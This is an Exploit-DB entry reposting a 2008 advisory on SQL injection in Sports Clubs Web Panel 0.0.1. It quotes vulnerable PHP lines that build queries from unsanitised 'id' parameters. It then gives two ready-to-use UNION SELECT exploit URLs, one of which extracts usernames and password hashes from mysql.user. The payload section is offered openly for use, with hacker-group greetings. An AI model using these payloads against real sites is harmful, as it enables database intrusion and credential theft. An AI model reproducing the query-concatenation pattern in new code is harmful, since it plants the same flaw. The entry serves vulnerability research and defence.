Sports Clubs Web Panel 0.0.1 - 'id' SQL Injection

EDB-ID:

6435

CVE:

2008-4592

EDB Verified:

Author:

Virangar Security

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-09-11

Vulnerable App:

  ###################################################################################
  #                                                                                 #
  #   ...::::: Sports Clubs Web Panel 0.0.1 SQL Injection Vulnerability ::::....    #           
  ###################################################################################

Virangar Security Team

www.virangar.net


--------
Discoverd By :virangar security team(Zahra:zh_virangar)

special tnx :my master hadihadi

tnx to:MR.nosrati,black.shadowes,MR.hesy,Ali007

& all virangar members & all hackerz
-------
vuln codes in /include/draw-view.php:

line 22:   if(isset($_GET['id']) || isset($_POST['id'])) {
lin 23:      $teamid = $_GET['id'].$_POST['id'];
...
...
line 43:  $drawTeam = mysql_query("SELECT * FROM draw WHERE dteam = '$teamid' ORDER BY ddate");
----------
vuln codes in /include/draw-edit.php

line 1:       $id = $_GET['id'];
line 2:       $editDraw = mysql_query("SELECT * FROM draw WHERE did='$id' LIMIT 1");
--------
exploit:
http://site.com/[patch]/?p=draw-view&id='/**/union/**/select/**/1,2,3,version(),5,6,User,password%20,9/**/from/**/mysql.user/*
http://site.com/[patch]/?p=draw-edit&id='/**/union/**/select/**/1,2,3,4,5,version(),7,8,9/*
-------------
young iranian h4ck3rz

# milw0rm.com [2008-09-11]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services